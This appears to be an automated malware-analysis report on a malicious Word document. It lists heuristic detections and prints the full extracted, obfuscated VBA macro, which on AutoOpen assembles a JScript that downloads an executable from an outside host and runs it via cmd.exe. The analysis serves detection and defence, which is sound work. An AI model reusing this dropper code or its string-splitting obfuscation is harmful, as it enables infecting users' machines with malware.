MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes CreateObject to instantiate objects like 'MSXML2.XMLHTTP' and 'WScript.Shell', indicating an attempt to download and execute a payload. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' specifically flags the AutoOpen macro for execution, confirming the malicious intent. The macro constructs strings to form 'WScript.Shell' and 'JavaScript' objects, suggesting it aims to run a script.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-1836869 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1836869
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
ywybc = yssiki & ezpuz & uwyv6 & gosy & omic & abzaxkutz Set awanwywaht = CreateObject(ywybc) awanwywaht.Language = kusik -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() farozja -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9522 bytes |
SHA-256: 550c1fa133a04b633e4418f50394e1044ca6f185c593ce225122036d47239dd3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub farozja()
Dim ohxax, yssiki, ywybc, uwyv6, kusik, hebuda, omic, ezpuz, pzedsoso, gosy, utuc5
omic = "ptCon"
pzedsoso = "JScr"
ohxax = "ipt"
hebuda = "lol"
abzaxkutz = "trol"
uwyv6 = "ntrol"
gosy = ".Scri"
yssiki = "MSScr"
ezpuz = "iptCo"
yxefcoko6 = Array("890", "729", "re3", "jla1", "func", "acqa9", "qujf7")(4) & Array("752", "or8", "snur6", "566", "tion", "567")(4) & Array("553", "838", "pagm3", "sre4", "agi2", "726", "zi7", " lol", "uss0")(7) & Array("ko1", "807", "887", " () ", "627", "vonc0", "pwenr7", "ybg5")(3) & Array("719", "543", "{var", "799")(2) & Array("snevh1", "fqaw6", "673", "kokm7", "496", "780", "896", "axqy6", " she")(8) & Array("ll =", "557", "882", "529", "xa9", "am0", "ubj8", "kfy4")(0) & Array("430", "595", "853", "561", " new", "ix7")(4) & Array("va2", "utn2", "mqer6", " Act", "xdac5")(3)
yzykliw = Array("iveX", "agva5", "otu6", "569", "500", "yja5", "469", "471", "zve6")(0) & Array("744", "876", "730", "Obje", "740", "co3", "456")(3) & Array("801", "ct (", "mka1", "ogw3", "ogu8", "fab6", "yfve4")(1) & Array("amv0", "lop7", "718", "900", "587", """WSc")(5) & Array("yko4", "ript", "efwa9", "681", "689", "468", "794", "415", "808")(1) & Array("755", "xe9", "ezmo1", ".She", "445", "urs1", "747", "iho1", "na0")(3) & Array("hvytp7", "itt0", "560", "ll"")", "744", "futl4")(3) & Array(";var", "oq3", "por6", "816", "514", "zju4")(0) & Array("603", " fso", "656", "594", "586", "799", "737", "716")(1)
kerale5 = Array(" = n", "530", "ubru4", "438", "705", "pix7", "ifl9", "554")(0) & Array("475", "fyt5", "dtitm2", "469", "686", "ew A")(5) & Array("qro5", "784", "625", "ctiv")(3) & Array("550", "858", "497", "548", "zybs6", "ac6", "eXOb")(6) & Array("719", "845", "731", "878", "ject")(4) & Array("604", "473", " (""S", "udo8")(2) & Array("crip", "801", "543", "589", "626", "636", "428")(0) & Array("523", "563", "ting", "opi4")(2) & Array("591", "aqn9", "675", "604", "ogx3", "be6", "ge3", ".Fil")(7)
zbewis3 = Array("mdip5", "qqa6", "ve0", "egf8", "495", "eSys")(5) & Array("temO", "za8", "udu1", "709", "604")(0) & Array("bjyn0", "vtol0", "731", "888", "zeqb5", "bjec", "426")(5) & Array("578", "451", "t"");", "469", "nju7", "lhyl9", "619", "645")(2) & Array("wuw8", "var ", "658", "705", "875", "ny3")(1) & Array("873", "ehze5", "tmp_", "vge0", "irv1", "ub6", "tta3", "ilq0", "459")(2) & Array("ypy1", "llug8", "path", "826")(2) & Array("870", "837", "560", "wko1", "ywy9", "711", " = f", "663", "686")(6) & Array("707", "577", "so.G", "564", "oj0", "ezs6")(2)
bnavi = Array("xe9", "678", "711", "kkerg3", "520", "etSp", "ecy4", "xomc4", "894")(5) & Array("774", "881", "624", "700", "yxy0", "ecia")(5) & Array("ovf8", "682", "lFol", "jut2", "587")(2) & Array("umbe1", "564", "der(", "ykni0", "679", "842", "ab3", "807", "byd2")(2) & Array("497", "rwosf0", "yrr4", "dzu3", " 2) ")(4) & Array("ih1", "ucne5", "834", "+ ""\", "423")(3) & Array("806", "615", "bme3", "ke0", "\"" +")(4) & Array("689", " fso", "tapj4", "766")(1) & Array("ar0", ".Get", "pa2", "vu8", "ave9")(1)
ipunducu = Array("493", "hmy2", "Temp", "ym7")(2) & Array("ta4", "onv9", "Name", "akk6", "fems0", "416", "iqd6")(2) & Array("405", "854", "602", "();v")(3) & Array("420", "656", "ar s", "579", "vesp0")(2) & Array("jhu8", "trea", "826", "624", "491")(1) & Array("jufx4", "axko6", "ifo6", "m = ", "aqby0", "ube7")(3) & Array("new ", "do6", "hej4", "ogla0")(0) & Array("Acti", "639", "525", "675", "xhe6", "vgers7", "xsa4", "gy0")(0) & Array("413", "843", "irf2", "814", "698", "zyh5", "veXO", "665")(6)
hhamxe = Array("483", "wxe3", "bjec", "836", "743", "535")(2) & Array("akba9", "675", "850", "zi0", "ita8", "813", "vew3", "t (""")(7) & Array("uxwy3", "ADOD", "did1", "885", "tvedn0")(1) & Array("B.St", "737", "lno3", "vsamz3", "781", "671", "506", "596", "461")(0) & Array("731", "826", "866", "582", "otq6", "ream", "703")(5) & Array("412", "796", "481", "607", """);s", "777", "569", "741", "641")(4) & Array("zno6", "835", "433", "695", "trea", "647", "565")(4) & Array("asu5", "554", "431", "m.Op", "gnel5", "812", "662")(3) & Array("ojqe0", "727", "en()", "706", "ix7")(2)
otuxe5 = Array("512", ";str", "ukf8", "493", "524", "oc9", "ema9", "548")(1) & Array("gxy0", "416", "655", "ta0", "eam.", "yra0", "hca0", "896", "ytl3")(4) & Array("774", "sqipl1", "873", "602", "Type", "606", "ac0", "640")(4) & Array("556", "681", "431", " = 1", "839")(3) & Array("ufh0", "735", "lzu4", "875", "637", "730", ";str", "597")(6) & Array("614", "874", "eam.", "na3", "ywjo6", "mvo5", "563", "li4")(2) & Array("odm5", "ocdi6", "ab6", "Posi", "425")(3) & Array("526", "564", "tion", "624")(2) & Array("fxa7", "548", "722", " = 0", "526", "bvy1", "541", "808", "ovy0")(3)
abesuho7 = Array("; va", "680", "sde5", "odra4", "863", "818")(0) & Array("413", "453", "r as", "670", "895")(2) & Array("kli2", "s = ", "rbe7", "vo1", "733")(1) & Array("yky4", "by0", "gys0", "552", "672", "upu8", "new ")(6) & Array("761", "vrup9", "em6", "li8", "468", "rvot4", "Acti", "710", "duqj3")(6) & Array("lux8", "veXO", "677", "435", "836")(1) & Array("ov8", "aqmu3", "468", "wwe3", "udh4", "bjec", "os9", "711", "upo1")(5) & Array("t(""M", "esm8", "aje9", "420")(0) & Array("al7", "mwavv2", "pfy9", "572", "omra9", "icro", "717", "491")(5)
arpadhums1 = Array("644", "ytu0", "880", "cu3", "tolc9", "soft")(5) & Array("qqa4", "478", "yj0", "694", "yzpa0", "854", "550", ".XML")(7) & Array("808", "499", "778", "HTTP", "857")(3) & Array("pji4", """);a", "of7", "444")(1) & Array("633", "jpi2", "awu8", "481", "803", "420", "ss.o", "ni0")(6) & Array("hjeb0", "igt0", "uti8", "834", "bno3", "rjas0", "660", "pen(")(7) & Array("""GET", "571", "eka0", "812")(0) & Array("506", "bqy0", "ace3", "888", """, """, "agf3", "831", "ubj6")(4) & Array("pbu8", "http", "480", "gna4", "uj5", "559", "jebw0")(1)
idihfe = Array("880", "582", "ly0", "ne0", "bba0", "://j", "405", "val3")(5) & Array("gis7", "698", "bria", "un7")(2) & Array("426", "674", "nwas", "qy9", "878")(2) & Array("857", "mew0", "xgy1", "uzu0", "hman", "726", "420")(4) & Array("757", "ech5", ".com", "ido0", "xkub2", "830", "ttu6", "ik8")(2) & Array("499", "543", "/dow", "em3", "803")(2) & Array("785", "856", "do8", "411", "nloa")(4) & Array("hmat0", "uf0", "d/fi", "665", "buw9", "643", "681")(2) & Array("778", "639", "429", "ylc9", "692", "les/")(5)
codfegj9 = Array("tax.", "442", "889", "899", "azz1", "kfa5", "447", "ru5")(0) & Array("tbasd9", "ipqy0", "zli7", "oj2", "571", "872", "exe""", "654", "aco0")(6) & Array("zca7", "593", ", 0)", "704")(2) & Array("qymt1", "ag8", ";ass", "516", "674", "650", "zdoz2")(2) & Array("idwa3", ".sen", "537", "uva8")(1) & Array("568", "je5", "oh8", "530", "590", "d();")(5) & Array("813", "615", "al4", "785", "stre", "698", "665")(4) & Array("acma1", "lec7", "am.W", "akv9")(2) & Array("418", "dky6", "447", "410", "anv5", "hih2", "549", "qgur8", "rite")(8)
vvawi4 = Array("urr4", "691", "pacl4", "exk2", "(ass", "bax7", "op4")(4) & Array("yvh9", ".Res", "818", "iz0", "430", "570", "rzi0")(1) & Array("kpyp7", "kut9", "vli8", "pons", "efa8", "gkud2", "tek1")(3) & Array("my3", "evb9", "787", "558", "eBod")(4) & Array("738", "898", "y);s", "afqy8")(2) & Array("hfi1", "545", "trea", "877", "693", "fvo7", "739", "576")(2) & Array("461", "m.Sa", "upwy7", "499", "zsiwf2")(1) & Array("lu3", "716", "veTo", "ecwu2", "rohm8", "iv7", "731")(2) & Array("706", "626", "tti5", "emu2", "igce9", "File", "826", "728", "711")(5)
bemderwufk = Array("458", "867", "(tmp", "vyjp0", "542", "762")(2) & Array("up5", "496", "_pat", "ahqo9")(2) & Array("qaxt6", "664", "avo6", "h);s", "ggi8", "588", "803", "847", "731")(3) & Array("agy6", "554", "860", "ymc4", "487", "trea", "jci2", "ca2", "bof8")(5) & Array("m.Cl", "486", "ejce4", "odu6")(0) & Array("891", "le3", "avi0", "628", "ose(", "668")(4) & Array("uta0", "ehs0", "am9", ");va")(3) & Array("fma9", "ihi2", "731", "r cm", "uqe1", "755", "ywma3", "dkot9")(3) & Array("li7", "op5", "614", "drun", "fsa3", "780", "jedt1", "we2")(3)
oxninpozq = Array("823", "rez4", "745", "756", " = """, "701")(4) & Array("goc9", "jgi0", "484", "cmd.")(3) & Array("712", "znogl8", "ygpe9", "ane7", "exe ")(4) & Array("520", "/c """, "514", "xzy7", "oha5")(1) & Array("479", "fbe5", " + t", "638")(2) & Array("mp_p", "mne0", "540", "tri8", "onn2", "777", "hisb1", "eb0")(0) & Array("403", "570", "895", "ath;", "808")(3) & Array("oq9", "sjop0", "666", " she", "813", "ajm4")(3) & Array("ll.r", "423", "822", "870", "ego0", "509", "662", "ors1")(0)
hwecuxidw9 = Array("unqy5", "un(c", "764", "aco5", "426", "631", "800", "431", "utx5")(1) & Array("691", "yk0", "632", "mdru", "bcadc3", "455", "408")(3) & Array("n, 0", "oka4", "437", "efw5", "865", "427", "687", "565", "ow1")(0) & Array("554", "697", "yqra5", "577", ");}", "728", "627", "809", "atzo7")(4)
utuc5 = hebuda
kusik = pzedsoso & ohxax
ywybc = yssiki & ezpuz & uwyv6 & gosy & omic & abzaxkutz
Set awanwywaht = CreateObject(ywybc)
awanwywaht.Language = kusik
awanwywaht.AddCode (yxefcoko6 & yzykliw & kerale5 & zbewis3 & bnavi & ipunducu & hhamxe & otuxe5 & abesuho7 & arpadhums1 & idihfe & codfegj9 & vvawi4 & bemderwufk & oxninpozq & hwecuxidw9)
awanwywaht.Run (utuc5)
End Sub
Sub AutoOpen()
farozja
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.